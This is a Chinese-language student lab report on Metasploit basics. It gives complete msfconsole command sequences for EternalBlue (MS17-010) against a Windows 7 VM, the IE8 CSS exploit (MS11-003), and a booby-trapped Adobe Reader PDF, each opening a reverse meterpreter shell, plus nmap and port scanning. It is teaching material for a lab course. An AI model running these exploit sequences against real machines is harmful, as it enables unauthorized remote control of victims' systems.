一、实践内容
- 1 一个主动攻击实践
- - 0 安装Win7虚拟机
  - 1 攻击前的准备
  - - 1.1 关闭Win7防火墙
    - 1.2 打开445端口
    - 1.3 查看靶机IP地址
  - 2 执行攻击
- 2 一个针对浏览器的攻击（新，用这个）
- 2 一个针对浏览器的攻击（废弃）
- 3 一个针对客户端的攻击，已adobe reader为例
- 4 辅助模块的使用
二、问题回答
- 1 用自己的话解释什么是exploit,payload,encode
- 2 实践总结与体会
- 3 离实战还缺些什么技术或步骤？

一、实践内容

本实践目标是掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路。

1 一个主动攻击实践

使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。

漏洞介绍
在微软官方的漏洞库中，有此漏洞的介绍与补丁，补丁编号：KB4013389。永恒之蓝相关病毒，其实是利用了微软的 MS17-010 漏洞。MS17-010 是 Windows 系统一个底层服务的漏洞，恶意代码会扫描开放 445 文件共享端口的 Windows 机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

本实验使用 Win7 作为靶机来进行渗透测试 Win7 环境说明:IP 地址 192.168.81.129 ,防火墙状态关闭。

0 安装Win7虚拟机

如果已经安装，跳过此步

本实验使用了Win7英文版的虚拟机，因此需要大家安装一下。过程并不繁琐，文件在3个G左右

迅雷下载种子：

ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/

自行安装即可，如果使用VM，可以进行“简易安装”，实现一键部署。

1 攻击前的准备

1.1 关闭Win7防火墙

1.2 打开445端口

具体操作请参考：链接

1.3 查看靶机IP地址

ipconfig

2 执行攻击

我们先看一下，靶机是否有这个漏洞

nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.81.129这是Win7的地址

结果如下，我们可以看到，有此漏洞

进入metasploit的命令是msfconfig
我们先看一下这个漏洞对应的MSF板块是哪些：

msf6 > search ms17_010

下面选择对应MSF板块，设置靶机ip地址，执行攻击：

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.81.129是Win7的IP地址
exploit

执行结果如下：

如上图所示，我们成功获得了目标主机的shell命令行，可以执行相关命令。

2 一个针对浏览器的攻击（新，用这个）

使用微软ms11-003漏洞

ms11-003(windows7IE溢出攻击) 是利用IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启的漏洞。

kali(192.168.81.133)
靶机：Windows 7+IE 8
攻击软件：metasploit

代码块：

//选择模块
use exploit/windows/browser/ms11_003_ie_css_import
//设置playload
set payload windows/meterpreter/reverse_tcp
//这是kali的地址
set srvhost 192.168.68.133
//也是kali的地址
set lhost 192.168.68.133
//下面的数字可以修改为学号
set uripath 2213

结果如下，我们获得了一个url链接：

之后：
在win7中，用IE访问：

在kali中，会有如下反映：

此时，执行：

sessions

选择1

sessions -i 1

获取到了shell

注意：如果sessions -i 1没成功，就试试sessions -i 2或者其他的~~

成功！

2 一个针对浏览器的攻击（废弃）

还是使用永恒之蓝ms17_010_eternalblue

kali(192.168.81.133)
靶机：Windows 7+IE 8(192.168.81.129)
攻击软件：metasploit

我们先看一下，靶机是否有这个漏洞

nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.81.129这是Win7的地址

然后开始进行相应的攻击

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.81.129这是Win7的地址
set LPORT 2213
set payload generic/shell_reverse_tcp
show options
exploit

使用win7的IE浏览器访问kali的ip地址192.168.81.133

之后，在kali中，就获取到了win7的命令行：

攻击成功！

3 一个针对客户端的攻击，已adobe reader为例

漏洞：adobe_cooltype_sing
安装adobe reader，安装包已经发在群中。

之后，执行以下命令：

use exploit/windows/fileformat/adobe_cooltype_sing //进入攻击模块
set payload windows/meterpreter/reverse_tcp  //选择攻击载荷
set LPORT 2213
set FILENAME 20192213lzq.pdf
set target 0
exploit

执行结果如下：

将文件复制到win7中

然后，我们进行监听，在msfconsole里输入back，可以返回上一级
然后输入：

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp  //选择攻击载荷
set LHOST 192.168.81.133 //设置攻击机IP地址
set LPORT 2213 //设置端口号
exploit //攻击

此时，在win7中使用adobe reader9.0打开该pdf文件：

获取到了目标的命令行：

如上图所示，攻击成功！

4 辅助模块的使用

metasploit的auxiliary(辅助模块)：包含扫描、fuzz测试、漏洞挖掘、⽹络协议欺骗等程序。
本例相对简单，建议大家使用不同的方式对自己的系统进行扫描。

可以参考这篇文章，里面介绍了许多功能的具体使用方法

下面，使用PortScan进行端口扫描
命令如下：

use auxiliary/scanner/portscan/tcp
show opticons
set rhosts 目标IP地址
exploit

结果如下：

我们可以看到，metasploit帮助我们获取了目标已经开放的端口，由此我们可以推测出靶机可能存在的漏洞和可能提供的服务，进而完成后续攻击。

二、问题回答

1 用自己的话解释什么是exploit,payload,encode

exploit：就是渗透攻击。这个模块下面有针对各种平台各种软件下的漏洞开发的渗透攻击子模块，用户可以调用某一个对靶机进行攻击。
payload：就是载荷。比如一个后门，通过什么平台下的基于什么软件的连接方式，可以通过此项来设置。
encode：就是一个编码器，把比如shellcode存在一些特征码，本来容易被靶机安全软件所察觉，用了这个编码器中的编码后就打乱了特征码，从而迷惑靶机。

2 实践总结与体会

此次实验尝试攻击了多个操作系统虚拟机，大都失败，原因可能是安装了补丁，同时部分攻击模块对中文操作系统支持不好，如果大家遇到了和我一样的问题，可以试试下载英文操作系统。

本次实验耗时主要在复现环境搭建上，经过测试发现metasploit对中文系统支持不是很好，第一次攻击win7 pro中文版时没有成功，无论如何调试都提示：无法建立对话。之后按照网上提示，我安装了英文版win7，问题得以解决。
与此同时，我尝试了攻击win server 2008，该系统在未打补丁的情况下也存在该漏洞，可惜由于我用的是腾讯服务器，没有自主配置防火墙的权限，因此攻击也没有成功。
通过做这次实验，发现其实漏洞的年限都比较久远了，所攻击的系统也很久远，XP，win7都停服了。但这并不意味着现在用的最新系统就没有漏洞就不会有人攻击，这次实验收获是很大的。

3 离实战还缺些什么技术或步骤？

首先不建议针对其他人的主机进行实战攻击。
从本实验可以看出，所有过程都需要靶机的配合，需要关掉靶机的防火墙和杀软，有的还需要在靶机上进行一些操作，距离实战我们还需要绕过防火墙、骗过杀软的方法，缺少了这些技术方法，我们实验的攻击方案基本没法实现。
同时我们使用的系统版本较老，也没有更新、安装过相关安全补丁，并且必须开放某些特定端口。

Exp6 MSF应用基础相关推荐

2019-2020-2 20175 212童皓桢《网络对抗技术》Exp6 MSF基础应用
2019-2020-2 20175212童皓桢<网络对抗技术> Exp6 MSF基础应用目录 1. 实验目标 2. 实验内容 2.1 主动攻击实践 2.2 针对浏览器的攻击 2.3 针对 ...
【MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令（入门初识）
目录一.简介: 二.下载: 2.1.kali 2.2.官网: 2.3.GitHub: 三.启动方法四.msf常用基础命令五.msf结构六. 核心命令: 一.简介: 很容易地获取.开发并对计算机 ...
内网渗透 Metasploit（MSF）基础使用
内网渗透 Metasploit(MSF)使用 1.认识 MSF Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安 ...
20145309李昊《网络对抗》MSF应用基础
实验内容掌握metasploit的基本应用方式 1.主动攻击--ms08_067 2.针对浏览器的攻击--ms11_050 3.针对客户端的攻击--Adobe 4.成功应用一个辅助模块--scann ...
Metasploit Framework（MSF）基础框架
Metasploit简介 Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗 ...
软件测试msf模型,Visual Studio 2010 Ultimate中MSF过程模型的设计
Visual Studio 2010 Ultimate中MSF过程模型的设计发表于:2010-04-06来源:作者:点击数: 过程模型是软件工程学中的一部分,就好比我们用什么过程方法进行软件&q ...
Windows系统——ATTCK靶场（一）——MSF方式
文章目录前言一.环境搭建二.Web部分三.内网部分(MSF方式) 四.横向移动(MSF方式) 五.总结笔记前言 windows系统的靶场太少了,就在重做一遍巩固下windows内网相关的基础 ...
一、初识Metasploit(MSF使用详解超详细)
前言:Metasploit是The Metasploit Framework的简称,也可以叫做MSF! MSF高度模块化即框架由多个module组成,是全球最受欢迎的工具. Metasploit Fr ...
metasploit怎么用? 基础(auxiliary、exploits、meterpreter)篇 (ﾟ益ﾟメ) 渗透测试
文章目录 metasplit框架 msf结构介绍进入msf msf常用基础命令进入.管理工作台搜索功能信息收集简单使用(测试漏洞为`ms17_010`) 辅助模块使用(`auxiliary` ...

Exp6 MSF应用基础

目录